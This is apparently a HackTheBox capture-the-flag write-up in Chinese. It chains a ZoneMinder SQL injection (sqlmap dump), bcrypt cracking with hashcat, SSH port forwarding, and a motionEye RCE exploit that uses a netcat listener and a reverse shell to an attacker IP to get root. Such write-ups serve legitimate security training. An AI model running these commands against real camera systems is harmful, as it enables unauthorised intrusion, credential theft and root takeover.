平台: HackTheBox | 操作系统: Linux
通过 CVE-2024-51482 对 ZoneMinder 进行 SQL 注入,从数据库中导出 bcrypt 哈希。使用 hashcat 破解后获得 SSH 访问权限。通过端口转发暴露的内部 motionEye 实例存在 CVE-2025-60787 漏洞——可获取 root shell。
nmap -sV -sC 10.129.53.160 -Pn
22/tcp open ssh OpenSSH 9.6p1 (Ubuntu)
80/tcp open http Apache 2.4.58 — SecureVision CCTV & Security Solutions
将 cctv.htb 添加到 /etc/hosts。80 端口托管了一个 ZoneMinder 安装实例。
CVE-2024-51482 是 ZoneMinder 登录端点中的一个 SQL 注入漏洞。username 参数未经过滤,允许提取数据库内容。
sqlmap -u "http://cctv.htb/zm/index.php" \
--data="username=admin&password=admin&action=login" \
--dbms=mysql --dump --batch
从 users 表中提取了一个 bcrypt 密码哈希。
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt
密码已破解。
ssh <user>@10.129.53.160
获取了 user flag。检查了内部服务。
ss -tlnp
# 127.0.0.1:8765 — motionEye CCTV management panel
转发了该端口。
ssh -L 8765:127.0.0.1:8765 <user>@10.129.53.160
CVE-2025-60787 是 motionEye 中的一个经过身份验证的 RCE 漏洞。在能够访问内部面板的情况下,可以以 root 身份执行任意命令。
nc -lvnp 4444
python3 exploit_CVE-2025-60787.py --url http://127.0.0.1:8765 --lhost <ATTACKER_IP> --lport 4444
获取了 root shell。Root flag 位于 /root/root.txt。
仅供教育目的使用。仅测试您拥有或已获得明确许可进行测试的系统。